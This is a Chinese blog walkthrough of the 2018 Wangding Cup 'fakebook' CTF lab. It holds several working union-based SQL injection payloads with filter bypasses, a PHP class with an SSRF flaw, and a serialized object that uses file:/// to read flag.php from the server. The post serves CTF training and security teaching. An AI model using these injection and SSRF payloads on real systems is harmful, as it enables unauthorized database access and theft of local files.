[网鼎杯2018}fakebook靶场思路,MariaDB注入,通关教程前言

于 2024-08-14 18:35:55 发布
阅读量814 收藏 22
点赞数 25
文章标签: 安全 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xt350488/article/details/141197396
版权

靶场链接:BUUCTF在线评测[%E7%BD%91%E9%BC%8E%E6%9D%AF%202018]Fakebook

Tips:更多优质【网络安全】文章主页

你的00后专属网安学习搭子-羽~

教程

首页

image-20240814100107403

sql万能密码

image-20240814103758640

登录失败

image-20240814103816908

注册一个账号试试

image-20240814103555624

当前页面好像也没有什么注入点

image-20240814103647238

目录扫描

image-20240814094129208

访问

352fdebbbd1706f951cdb8538db5938

image-20240813225527087

得到user.php源码

<?php
​
​
class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";
​
    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }
​
    function get($url)
    {
        $ch = curl_init();
​
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);
​
        return $output;
    }
​
    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }
​
    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }
​
}

这句代码,很明显,存在ssrf漏洞,看看待会能不能用上

    function get($url)
    {
        $ch = curl_init();
​
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);
​
        return $output;
    }

SSRF参考:CTFHub技能树通关教程——SSRF漏洞原理攻击与防御(一)(超详细总结)

添加一条数据后

image-20240814114600163

看到一个no参数

image-20240814114631446

尝试注入,sql语句错误,存在sql注入漏洞

sqlmap失败

image-20240813231834300

手工添加引号和注释符号#,还是报sql语句错误,没有回显,那么我们去掉单引号试试

?no=1' and 1=2 #

image-20240814142207444

Tips : 手工注入文章参考:从零开始学SQL注入(sql十大注入类型):技术解析与实战演练

正常回显

?no=1 and 1=2 #

image-20240814142418113

查询没有6列

?no=1 order by 6 #

image-20240814142525233

order by 4正常回显,存在四列

?no=1 order by 4 #

image-20240813232209412

没有回显,大概率是过滤掉了,但不知道是过滤哪个关键词

?no=1 union select 1,2,3,4 #

image-20240814142647273

双写,看样子不是用了替换函数

?no=1 ununionion select 1,2,3,4 #
​

image-20240814143049672

使用/**/这个代替空格

?no=1/**/union/**/select/**/1,2,3,4 #

image-20240814142946369

no改成-1

image-20240814143307392

当前数据库

?no=-1/**/union/**/select 1,group_concat(database()),3,4 from information_schema.schemata #

fakebook,information_schema,mysql,performance_schema,test

image-20240814144129595

爆表,得到表名users

?no=-1/**/union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='fakebook' #

image-20240814144737657

爆列,得到列名

?no=-1/**/union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema='fakebook' #

image-20240814144950113

查找用户表中所有符合条件的数据,却发现有一个序列化的结果

?no=-1/**/union/**/select 1,group_concat(no,'-',username,'-',passwd,'-',data),3,4 from users #

image-20240814150000045

但是,没有正常回显啊

image-20240814151913870

我们这样试试,把4替换为这个序列化的结果

image-20240814152849364

一切正常

image-20240814154443033

且源码中能显示正常结果的,是data伪协议标准格式,使用base64加密算法

data:text/html;base64,PCFET0NUWVBFIGh0bWw+PGh0bWw+PGhlYWQ+PG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9VVRGLTgiPjxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9ZWRnZSxjaHJvbWU9MSI+PG1ldGEgY29udGVudD0iYWx3YXlzIiBuYW1lPSJyZWZlcnJlciI+PG1ldGEgbmFtZT0iZGVzY3JpcHRpb24iIGNvbnRlbnQ9IuWFqOeQg+mihuWFiOeahOS4reaWh+aQnOe0ouW8leaTjuOAgeiHtOWKm+S6juiuqee9keawkeabtOS+v+aNt+WcsOiOt+WPluS/oeaBr++8jOaJvuWIsOaJgOaxguOAgueZvuW6pui2hei/h+WNg+S6v+eahOS4reaWh+e9kemhteaVsOaNruW6k++8jOWPr+S7peeerOmXtOaJvuWIsOebuOWFs+eahOaQnOe0oue7k+aenOOAgiI+PGxpbmsgcmVsPSJzaG9ydGN1dCBpY29uIiBocmVmPSIvL3d3dy5iYWlkdS5jb20vZmF2aWNvbi5pY28iIHR5cGU9ImltYWdlL3gtaWNvbiI+PGxpbmsgcmVsPSJzZWFyY2giIHR5cGU9ImFwcGxpY2F0aW9uL29wZW5zZWFyY2hkZXNjcmlwdGlvbit4bWwiIGhyZWY9Ii8vd3d3LmJhaWR1LmNvbS9jb250ZW50LXNlYXJjaC54bWwiIHRpdGxlPSLnmb7luqbmkJzntKIiPjx0aXRsZT7nmb7luqbkuIDkuIvvvIzkvaDlsLHnn6XpgZM8L3RpdGxlPjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+Ym9keXttYXJnaW46MDtwYWRkaW5nOjA7dGV4dC1hbGlnbjpjZW50ZXI7YmFja2dyb3VuZDojZmZmO2hlaWdodDoxMDAlfWh0bWx7b3ZlcmZsb3cteTphdXRvO2NvbG9yOiMwMDA7b3ZlcmZsb3c6LW1vei1zY3JvbGxiYXJzO2hlaWdodDoxMDAlfWJvZHksaW5wdXR7Zm9udC1zaXplOjEycHg7Zm9udC1mYW1pbHk6IlBpbmdGYW5nIFNDIixBcmlhbCwiTWljcm9zb2Z0IFlhSGVpIixzYW5zLXNlcmlmfWF7dGV4dC1kZWNvcmF0aW9uOm5vbmV9YTpob3Zlcnt0ZXh0LWRlY29yYXRpb246dW5kZXJsaW5lfWltZ3tib3JkZXI6MDstbXMtaW50ZXJwb2xhdGlvbi1tb2RlOmJpY3ViaWN9aW5wdXR7Zm9udC1zaXplOjEwMCU7Ym9yZGVyOjB9Ym9keSxmb3Jte3Bvc2l0aW9uOnJlbGF0aXZlO3otaW5kZXg6MH0jd3JhcHBlcntoZWlnaHQ6MTAwJX0jaGVhZF93cmFwcGVyLnMtcHMtaXNsaXRle3BhZGRpbmctYm90dG9tOjM3MHB4fSNoZWFkX3dyYXBwZXIucy1wcy1pc2xpdGUgLnNfZm9ybXtwb3NpdGlvbjpyZWxhdGl2ZTt6LWluZGV4OjF9I2hlYWRfd3JhcHBlci5zLXBzLWlzbGl0ZSAuZm17cG9zaXRpb246YWJzb2x1dGU7Ym90dG9tOjB9I2hlYWRfd3JhcHBlci5zLXBzLWlzbGl0ZSAucy1wLXRvcHtwb3NpdGlvbjphYnNvbHV0ZTtib3R0b206NDBweDt3aWR0aDoxMDAlO2hlaWdodDoxODFweH0jaGVhZF93cmFwcGVyLnMtcHMtaXNsaXRlICNzX2xnX2ltZ3twb3NpdGlvbjpzdGF0aWM7bWFyZ2luOjMzcHggYXV0byAwIGF1dG87bGVmdDo1MCV9I2Zvcm17ei1pbmRleDoxfS5zX2Zvcm1fd3JhcHBlcntoZWlnaHQ6MTAwJX0jbGh7bWFyZ2luOjE2cHggMCA1cHg7d29yZC1zcGFjaW5nOjNweH0uYy1mb250LW5vcm1hbHtmb250OjEzcHgvMjNweCBBcmlhbCxzYW5zLXNlcmlmfS5jLWNvbG9yLXR7Y29sb3I6IzIyMn0uYy1idG4sLmMtYnRuOnZpc2l0ZWR7Y29sb3I6IzMzMyFpbXBvcnRhbnR9LmMtYnRue2Rpc3BsYXk6aW5saW5lLWJsb2NrO292ZXJmbG93OmhpZGRlbjtmb250LWZhbWlseTppbmhlcml0O2ZvbnQtd2VpZ2h0OjQwMDt0ZXh0LWFsaWduOmNlbnRlcjt2ZXJ0aWNhbC1hbGlnbjptaWRkbGU7b3V0bGluZTowO2JvcmRlcjowO2hlaWdodDozMHB4O3dpZHRoOjgwcHg7bGluZS1oZWlnaHQ6MzBweDtmb250LXNpemU6MTNweDtib3JkZXItcmFkaXVzOjZweDtwYWRkaW5nOjA7YmFja2dyb3VuZC1jb2xvcjojZjVmNWY2O2N1cnNvcjpwb2ludGVyfS5jLWJ0bjpob3ZlcntiYWNrZ3JvdW5kLWNvbG9yOiMzMTVlZmI7Y29sb3I6I2ZmZiFpbXBvcnRhbnR9YS5jLWJ0bnt0ZXh0LWRlY29yYXRpb246bm9uZX0uYy1idG4tbWluaXtoZWlnaHQ6MjRweDt3aWR0aDo0OHB4O2xpbmUtaGVpZ2h0OjI0cHh9LmMtYnRuLXByaW1hcnksLmMtYnRuLXByaW1hcnk6dmlzaXRlZHtjb2xvcjojZmZmIWltcG9ydGFudH0uYy1idG4tcHJpbWFyeXtiYWNrZ3JvdW5kLWNvbG9yOiM0ZTZlZjJ9LmMtYnRuLXByaW1hcnk6aG92ZXJ7YmFja2dyb3VuZC1jb2xvcjojMzE1ZWZifWE6YWN0aXZle2NvbG9yOiNmNjB9I3dyYXBwZXJ7cG9zaXRpb246cmVsYXRpdmU7bWluLWhlaWdodDoxMDAlfSNoZWFke3BhZGRpbmctYm90dG9tOjEwMHB4O3RleHQtYWxpZ246Y2VudGVyfSN3cmFwcGVye21pbi13aWR0aDoxMjUwcHg7aGVpZ2h0OjEwMCU7bWluLWhlaWdodDo2MDBweH0jaGVhZHtwb3NpdGlvbjpyZWxhdGl2ZTtwYWRkaW5nLWJvdHRvbTowO2hlaWdodDoxMDAlO21pbi1oZWlnaHQ6NjAwcHh9LnNfZm9ybV93cmFwcGVye2hlaWdodDoxMDAlfS5xdWlja2RlbGV0ZS13cmFwe3Bvc2l0aW9uOnJlbGF0aXZlfS50b29sc3twb3NpdGlvbjphYnNvbHV0ZTtyaWdodDotNzVweH0ucy1pc2luZGV4LXdyYXB7cG9zaXRpb246cmVsYXRpdmV9I2hlYWRfd3JhcHBlci5oZWFkX3dyYXBwZXJ7d2lkdGg6YXV0b30jaGVhZF93cmFwcGVye3Bvc2l0aW9uOnJlbGF0aXZlO2hlaWdodDo0MCU7bWluLWhlaWdodDozMTRweDttYXgtaGVpZ2h0OjUxMHB4O3dpZHRoOjEwMDBweDttYXJnaW46MCBhdXRvfSNoZWFkX3dyYXBwZXIgLnMtcC10b3B7aGVpZ2h0OjYwJTttaW4taGVpZ2h0OjE4NXB4O21heC1oZWlnaHQ6MzEwcHg7cG9zaXRpb246cmVsYXRpdmU7ei1pbmRleDowO3RleHQtYWxpZ246Y2VudGVyfSNoZWFkX3dyYXBwZXIgaW5wdXR7b3V0bGluZTowOy13ZWJraXQtYXBwZWFyYW5jZTpub25lfSNoZWFkX3dyYXBwZXIgLnNfYnRuX3dyLCNoZWFkX3dyYXBwZXIgLnNfaXB0X3dye2Rpc3BsYXk6aW5saW5lLWJsb2NrO3pvb206MTtiYWNrZ3JvdW5kOjAgMDt2ZXJ0aWNhbC1hbGlnbjp0b3B9I2hlYWRfd3JhcHBlciAuc19pcHRfd3J7cG9zaXRpb246cmVsYXRpdmU7d2lkdGg6NTQ2cHh9I2hlYWRfd3JhcHBlciAuc19idG5fd3J7d2lkdGg6MTA4cHg7aGVpZ2h0OjQ0cHg7cG9zaXRpb246cmVsYXRpdmU7ei1pbmRleDoyfSNoZWFkX3dyYXBwZXIgLnNfaXB0X3dyOmhvdmVyICNrd3tib3JkZXItY29sb3I6I2E3YWFiNX0jaGVhZF93cmFwcGVyICNrd3t3aWR0aDo1MTJweDtoZWlnaHQ6MTZweDtwYWRkaW5nOjEycHggMTZweDtmb250LXNpemU6MTZweDttYXJnaW46MDt2ZXJ0aWNhbC1hbGlnbjp0b3A7b3V0bGluZTowO2JveC1zaGFkb3c6bm9uZTtib3JkZXItcmFkaXVzOjEwcHggMCAwIDEwcHg7Ym9yZGVyOjJweCBzb2xpZCAjYzRjN2NlO2JhY2tncm91bmQ6I2ZmZjtjb2xvcjojMjIyO292ZXJmbG93OmhpZGRlbjtib3gtc2l6aW5nOmNvbnRlbnQtYm94fSNoZWFkX3dyYXBwZXIgI2t3OmZvY3Vze2JvcmRlci1jb2xvcjojNGU2ZWYyIWltcG9ydGFudDtvcGFjaXR5OjF9I2hlYWRfd3JhcHBlciAuc19mb3Jte3dpZHRoOjY1NHB4O2hlaWdodDoxMDAlO21hcmdpbjowIGF1dG87dGV4dC1hbGlnbjpsZWZ0O3otaW5kZXg6MTAwfSNoZWFkX3dyYXBwZXIgLnNfYnRue2N1cnNvcjpwb2ludGVyO3dpZHRoOjEwOHB4O2hlaWdodDo0NHB4O2xpbmUtaGVpZ2h0OjQ1cHg7cGFkZGluZzowO2JhY2tncm91bmQ6MCAwO2JhY2tncm91bmQtY29sb3I6IzRlNmVmMjtib3JkZXItcmFkaXVzOjAgMTBweCAxMHB4IDA7Zm9udC1zaXplOjE3cHg7Y29sb3I6I2ZmZjtib3gtc2hhZG93Om5vbmU7Zm9udC13ZWlnaHQ6NDAwO2JvcmRlcjpub25lO291dGxpbmU6MH0jaGVhZF93cmFwcGVyIC5zX2J0bjpob3ZlcntiYWNrZ3JvdW5kLWNvbG9yOiM0NjYyZDl9I2hlYWRfd3JhcHBlciAuc19idG46YWN0aXZle2JhY2tncm91bmQtY29sb3I6IzQ2NjJkOX0jaGVhZF93cmFwcGVyIC5xdWlja2RlbGV0ZS13cmFwe3Bvc2l0aW9uOnJlbGF0aXZlfSNzX3RvcF93cmFwe3Bvc2l0aW9uOmFic29sdXRlO3otaW5kZXg6OTk7bWluLXdpZHRoOjEwMDBweDt3aWR0aDoxMDAlfS5zLXRvcC1sZWZ0e3Bvc2l0aW9uOmFic29sdXRlO2xlZnQ6MDt0b3A6MDt6LWluZGV4OjEwMDtoZWlnaHQ6NjBweDtwYWRkaW5nLWxlZnQ6MjRweH0ucy10b3AtbGVmdCAubW5hdnttYXJnaW4tcmlnaHQ6MzFweDttYXJnaW4tdG9wOjE5cHg7ZGlzcGxheTppbmxpbmUtYmxvY2s7cG9zaXRpb246cmVsYXRpdmV9LnMtdG9wLWxlZnQgLm1uYXY6aG92ZXIgLnMtYnJpLC5zLXRvcC1sZWZ0IGE6aG92ZXJ7Y29sb3I6IzMxNWVmYjt0ZXh0LWRlY29yYXRpb246bm9uZX0ucy10b3AtbGVmdCAucy10b3AtbW9yZS1idG57cGFkZGluZy1ib3R0b206MTlweH0ucy10b3AtbGVmdCAucy10b3AtbW9yZS1idG46aG92ZXIgLnMtdG9wLW1vcmV7ZGlzcGxheTpibG9ja30ucy10b3AtcmlnaHR7cG9zaXRpb246YWJzb2x1dGU7cmlnaHQ6MDt0b3A6MDt6LWluZGV4OjEwMDtoZWlnaHQ6NjBweDtwYWRkaW5nLXJpZ2h0OjI0cHh9LnMtdG9wLXJpZ2h0IC5zLXRvcC1yaWdodC10ZXh0e21hcmdpbi1sZWZ0OjMycHg7bWFyZ2luLXRvcDoxOXB4O2Rpc3BsYXk6aW5saW5lLWJsb2NrO3Bvc2l0aW9uOnJlbGF0aXZlO3ZlcnRpY2FsLWFsaWduOnRvcDtjdXJzb3I6cG9pbnRlcn0ucy10b3AtcmlnaHQgLnMtdG9wLXJpZ2h0LXRleHQ6aG92ZXJ7Y29sb3I6IzMxNWVmYn0ucy10b3AtcmlnaHQgLnMtdG9wLWxvZ2luLWJ0bntkaXNwbGF5OmlubGluZS1ibG9jazttYXJnaW4tdG9wOjE4cHg7bWFyZ2luLWxlZnQ6MzJweDtmb250LXNpemU6MTNweH0ucy10b3AtcmlnaHQgYTpob3Zlcnt0ZXh0LWRlY29yYXRpb246bm9uZX0jYm90dG9tX2xheWVye3dpZHRoOjEwMCU7cG9zaXRpb246Zml4ZWQ7ei1pbmRleDozMDI7Ym90dG9tOjA7bGVmdDowO2hlaWdodDozOXB4O3BhZGRpbmctdG9wOjFweDtvdmVyZmxvdzpoaWRkZW47em9vbToxO21hcmdpbjowO2xpbmUtaGVpZ2h0OjM5cHg7YmFja2dyb3VuZDojZmZmfSNib3R0b21fbGF5ZXIgLmxoe2Rpc3BsYXk6aW5saW5lO21hcmdpbi1yaWdodDoyMHB4fSNib3R0b21fbGF5ZXIgLmxoOmxhc3QtY2hpbGR7bWFyZ2luLWxlZnQ6LTJweDttYXJnaW4tcmlnaHQ6MH0jYm90dG9tX2xheWVyIC5saC5hY3Rpdml0eXtmb250LXdlaWdodDo3MDA7dGV4dC1kZWNvcmF0aW9uOnVuZGVybGluZX0jYm90dG9tX2xheWVyIGF7Zm9udC1zaXplOjEycHg7dGV4dC1kZWNvcmF0aW9uOm5vbmV9I2JvdHRvbV9sYXllciAudGV4dC1jb2xvcntjb2xvcjojYmJifSNib3R0b21fbGF5ZXIgYTpob3Zlcntjb2xvcjojMjIyfSNib3R0b21fbGF5ZXIgLnMtYm90dG9tLWxheWVyLWNvbnRlbnR7dGV4dC1hbGlnbjpjZW50ZXJ9PC9zdHlsZT48L2hlYWQ+PGJvZHk+PGRpdiBpZD0id3JhcHBlciIgY2xhc3M9IndyYXBwZXJfbmV3Ij48ZGl2IGlkPSJoZWFkIj48ZGl2IGlkPSJzLXRvcC1sZWZ0IiBjbGFzcz0icy10b3AtbGVmdCBzLWlzaW5kZXgtd3JhcCI+PGEgaHJlZj0iLy9uZXdzLmJhaWR1LmNvbS8iIHRhcmdldD0iX2JsYW5rIiBjbGFzcz0ibW5hdiBjLWZvbnQtbm9ybWFsIGMtY29sb3ItdCI+5paw6Ze7PC9hPjxhIGhyZWY9Ii8vd3d3LmhhbzEyMy5jb20vIiB0YXJnZXQ9Il9ibGFuayIgY2xhc3M9Im1uYXYgYy1mb250LW5vcm1hbCBjLWNvbG9yLXQiPmhhbzEyMzwvYT48YSBocmVmPSIvL21hcC5iYWlkdS5jb20vIiB0YXJnZXQ9Il9ibGFuayIgY2xhc3M9Im1uYXYgYy1mb250LW5vcm1hbCBjLWNvbG9yLXQiPuWcsOWbvjwvYT48YSBocmVmPSIvL2xpdmUuYmFpZHUuY29tLyIgdGFyZ2V0PSJfYmxhbmsiIGNsYXNzPSJtbmF2IGMtZm9udC1ub3JtYWwgYy1jb2xvci10Ij7nm7Tmkq08L2E+PGEgaHJlZj0iLy9oYW9rYW4uYmFpZHUuY29tLz9zZnJvbT1iYWlkdS10b3AiIHRhcmdldD0iX2JsYW5rIiBjbGFzcz0ibW5hdiBjLWZvbnQtbm9ybWFsIGMtY29sb3ItdCI+6KeG6aKRPC9hPjxhIGhyZWY9Ii8vdGllYmEuYmFpZHUuY29tLyIgdGFyZ2V0PSJfYmxhbmsiIGNsYXNzPSJtbmF2IGMtZm9udC1ub3JtYWwgYy1jb2xvci10Ij7otLTlkKc8L2E+PGEgaHJlZj0iLy94dWVzaHUuYmFpZHUuY29tLyIgdGFyZ2V0PSJfYmxhbmsiIGNsYXNzPSJtbmF2IGMtZm9udC1ub3JtYWwgYy1jb2xvci10Ij7lrabmnK88L2E+PGRpdiBjbGFzcz0ibW5hdiBzLXRvcC1tb3JlLWJ0biI+PGEgaHJlZj0iLy93d3cuYmFpZHUuY29tL21vcmUvIiBuYW1lPSJ0al9icmlpY29uIiBjbGFzcz0icy1icmkgYy1mb250LW5vcm1hbCBjLWNvbG9yLXQiIHRhcmdldD0iX2JsYW5rIj7mm7TlpJo8L2E+PC9kaXY+PC9kaXY+PGRpdiBpZD0idTEiIGNsYXNzPSJzLXRvcC1yaWdodCBzLWlzaW5kZXgtd3JhcCI+PGEgY2xhc3M9InMtdG9wLWxvZ2luLWJ0biBjLWJ0biBjLWJ0bi1wcmltYXJ5IGMtYnRuLW1pbmkgbGIiIHN0eWxlPSJwb3NpdGlvbjpyZWxhdGl2ZTtvdmVyZmxvdzp2aXNpYmxlIiBuYW1lPSJ0al9sb2dpbiIgaHJlZj0iLy93d3cuYmFpZHUuY29tL2Jkb3J6L2xvZ2luLmdpZj9sb2dpbiZhbXA7dHBsPW1uJmFtcDt1PWh0dHAlM0ElMkYlMkZ3d3cuYmFpZHUuY29tJTJmJTNmYmRvcnpfY29tZSUzZDEiPueZu+W9lTwvYT48L2Rpdj48ZGl2IGlkPSJoZWFkX3dyYXBwZXIiIGNsYXNzPSJoZWFkX3dyYXBwZXIgcy1pc2luZGV4LXdyYXAgcy1wcy1pc2xpdGUiPjxkaXYgY2xhc3M9InNfZm9ybSI+PGRpdiBjbGFzcz0ic19mb3JtX3dyYXBwZXIiPjxkaXYgaWQ9ImxnIiBjbGFzcz0icy1wLXRvcCI+PGltZyBoaWRlZm9jdXM9InRydWUiIGlkPSJzX2xnX2ltZyIgY2xhc3M9ImluZGV4LWxvZ28tc3JjIiBzcmM9Ii8vd3d3LmJhaWR1LmNvbS9pbWcvZmxleGlibGUvbG9nby9wYy9pbmRleC5wbmciIHdpZHRoPSIyNzAiIGhlaWdodD0iMTI5IiB1c2VtYXA9IiNtcCI+PG1hcCBuYW1lPSJtcCI+PGFyZWEgc3R5bGU9Im91dGxpbmU6MCIgaGlkZWZvY3VzPSJ0cnVlIiBzaGFwZT0icmVjdCIgY29vcmRzPSIwLDAsMjcwLDEyOSIgaHJlZj0iLy93d3cuYmFpZHUuY29tL3M/d2Q9JUU3JTk5JUJFJUU1JUJBJUE2JUU3JTgzJUFEJUU2JTkwJTlDJmFtcDtzYT1pcmVfZGxfZ2hfbG9nb190ZXhpbmcmYW1wO3Jzdl9kbD1pZ2hfbG9nb19wY3MiIHRhcmdldD0iX2JsYW5rIiB0aXRsZT0i54K55Ye75LiA5LiL77yM5LqG6Kej5pu05aSaIj48L21hcD48L2Rpdj48YSBocmVmPSIvL3d3dy5iYWlkdS5jb20vIiBpZD0icmVzdWx0X2xvZ28iPjwvYT48Zm9ybSBpZD0iZm9ybSIgbmFtZT0iZiIgYWN0aW9uPSIvL3d3dy5iYWlkdS5jb20vcyIgY2xhc3M9ImZtIj48aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJpZSIgdmFsdWU9InV0Zi04Ij4gPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZiIgdmFsdWU9IjgiPiA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJyc3ZfYnAiIHZhbHVlPSIxIj4gPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0icnN2X2lkeCIgdmFsdWU9IjEiPiA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJjaCIgdmFsdWU9IiI+IDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InRuIiB2YWx1ZT0iYmFpZHUiPiA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJiYXIiIHZhbHVlPSIiPiA8c3BhbiBjbGFzcz0ic19pcHRfd3IgcXVpY2tkZWxldGUtd3JhcCI+PGlucHV0IGlkPSJrdyIgbmFtZT0id2QiIGNsYXNzPSJzX2lwdCIgdmFsdWU9IiIgbWF4bGVuZ3RoPSIyNTUiIGF1dG9jb21wbGV0ZT0ib2ZmIj4gPC9zcGFuPjxzcGFuIGNsYXNzPSJzX2J0bl93ciI+PGlucHV0IHR5cGU9InN1Ym1pdCIgaWQ9InN1IiB2YWx1ZT0i55m+5bqm5LiA5LiLIiBjbGFzcz0iYmcgc19idG4iPiA8L3NwYW4+PGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0icm4iIHZhbHVlPSIiPiA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJmZW5sZWkiIHZhbHVlPSIyNTYiPiA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJvcSIgdmFsdWU9IiI+IDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InJzdl9wcSIgdmFsdWU9ImI5ZmYwOTNlMDAwMGU0MTkiPiA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJyc3ZfdCIgdmFsdWU9IjM2MzVGWWJkYkM4dGxXbXVkWm1ZYVVuYXVjTmUrUnpUek5FR3FnL0p1bmlRVTEwV0w1bXRNUWVoSXJVIj4gPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0icnFsYW5nIiB2YWx1ZT0iY24iPiA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJyc3ZfZW50ZXIiIHZhbHVlPSIxIj4gPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0icnN2X2RsIiB2YWx1ZT0iaWIiPjwvZm9ybT48L2Rpdj48L2Rpdj48L2Rpdj48ZGl2IGlkPSJib3R0b21fbGF5ZXIiIGNsYXNzPSJzLWJvdHRvbS1sYXllciBzLWlzaW5kZXgtd3JhcCI+PGRpdiBjbGFzcz0icy1ib3R0b20tbGF5ZXItY29udGVudCI+PHAgY2xhc3M9ImxoIj48YSBjbGFzcz0idGV4dC1jb2xvciIgaHJlZj0iLy9ob21lLmJhaWR1LmNvbS8iIHRhcmdldD0iX2JsYW5rIj7lhbPkuo7nmb7luqY8L2E+PC9wPjxwIGNsYXNzPSJsaCI+PGEgY2xhc3M9InRleHQtY29sb3IiIGhyZWY9Ii8vaXIuYmFpZHUuY29tLyIgdGFyZ2V0PSJfYmxhbmsiPkFib3V0IEJhaWR1PC9hPjwvcD48cCBjbGFzcz0ibGgiPjxhIGNsYXNzPSJ0ZXh0LWNvbG9yIiBocmVmPSIvL3d3dy5iYWlkdS5jb20vZHV0eSIgdGFyZ2V0PSJfYmxhbmsiPuS9v+eUqOeZvuW6puWJjeW/heivuzwvYT48L3A+PHAgY2xhc3M9ImxoIj48YSBjbGFzcz0idGV4dC1jb2xvciIgaHJlZj0iLy9oZWxwLmJhaWR1LmNvbS8iIHRhcmdldD0iX2JsYW5rIj7luK7liqnkuK3lv4M8L2E+PC9wPjxwIGNsYXNzPSJsaCI+PGEgY2xhc3M9InRleHQtY29sb3IiIGhyZWY9Ii8vd3d3LmJlaWFuLmdvdi5jbi9wb3J0YWwvcmVnaXN0ZXJTeXN0ZW1JbmZvP3JlY29yZGNvZGU9MTEwMDAwMDIwMDAwMDEiIHRhcmdldD0iX2JsYW5rIj7kuqzlhaznvZHlronlpIcxMTAwMDAwMjAwMDAwMeWPtzwvYT48L3A+PHAgY2xhc3M9ImxoIj48YSBjbGFzcz0idGV4dC1jb2xvciIgaHJlZj0iLy9iZWlhbi5taWl0Lmdvdi5jbi8iIHRhcmdldD0iX2JsYW5rIj7kuqxJQ1Dor4EwMzAxNzPlj7c8L2E+PC9wPjxwIGNsYXNzPSJsaCI+PHNwYW4gaWQ9InllYXIiIGNsYXNzPSJ0ZXh0LWNvbG9yIj48L3NwYW4+PC9wPjxwIGNsYXNzPSJsaCI+PHNwYW4gY2xhc3M9InRleHQtY29sb3IiPuS6kuiBlOe9keiNr+WTgeS/oeaBr+acjeWKoei1hOagvOivgeS5piAo5LqsKS3nu4/okKXmgKctMjAxNy0wMDIwPC9zcGFuPjwvcD48cCBjbGFzcz0ibGgiPjxhIGNsYXNzPSJ0ZXh0LWNvbG9yIiBocmVmPSIvL3d3dy5iYWlkdS5jb20vbGljZW5jZS8iIHRhcmdldD0iX2JsYW5rIj7kv6Hmga/nvZHnu5zkvKDmkq3op4blkKzoioLnm67orrjlj6/or4EgMDExMDUxNjwvYT48L3A+PC9kaXY+PC9kaXY+PC9kaXY+PC9kaXY+PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPnZhciBkYXRlPW5ldyBEYXRlLHllYXI9ZGF0ZS5nZXRGdWxsWWVhcigpO2RvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJ5ZWFyIikuaW5uZXJUZXh0PSLCqSIreWVhcisiIEJhaWR1ICI8L3NjcmlwdD48L2JvZHk+PC9odG1sPg==

image-20240814152126339

解密之后,这不就是我新加的那条数据blog的网址嘛,确实存在ssrf漏洞

image-20240814152332959

构造序列化对象,我们使用file协议,读取本地文件(/var/www/html/flag.php 这个路径之前每个报错界面基本都有,猜测flag在这个站点根目录下)

file:// 用于访问本地文件系统,在CTF中通常用来读取本地文件,且不受PHP的allow_url_fopen与allow_url_include配置影响

例如读取D盘目录下的指定文件:http://127.0.0.1/cmd.php?file=file://D:/soft/phpStudy/WWW/phpcode.txt

class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";
}
$res = new UserInfo();
echo serialize($res); // O:8:"UserInfo":3:{s:4:"name";s:5:"mochu";s:3:"age";i:7;s:4:"blog";s:29:"file:///var/www/html/flag.php";}

构造payload

?no=-1/**/union/**/select 1,group_concat(no,'-',username,'-',passwd,'-',data),3,'O:8:"UserInfo":3:{s:4:"name";s:5:"mochu";s:3:"age";i:7;s:4:"blog";s:29:"file:///var/www/html/flag.php";}' from users #

image-20240814155114938

查看源码

image-20240814155149993

解密得到flag

image-20240814155223904

往期文章

从零开始学SQL注入(sql十大注入类型):技术解析与实战演练

SQL注入绕过某狗的waf防火墙,这一篇就够了,6k文案超详细

网络安全一场梦,护网三天就结束,多少有点走过场。

Love-Yi情侣网站存在sql注入漏洞

泷羽Sec
关注
网络安全 | CTF】fakebook网鼎杯2018)解题详析
等风来
07-24 1万+
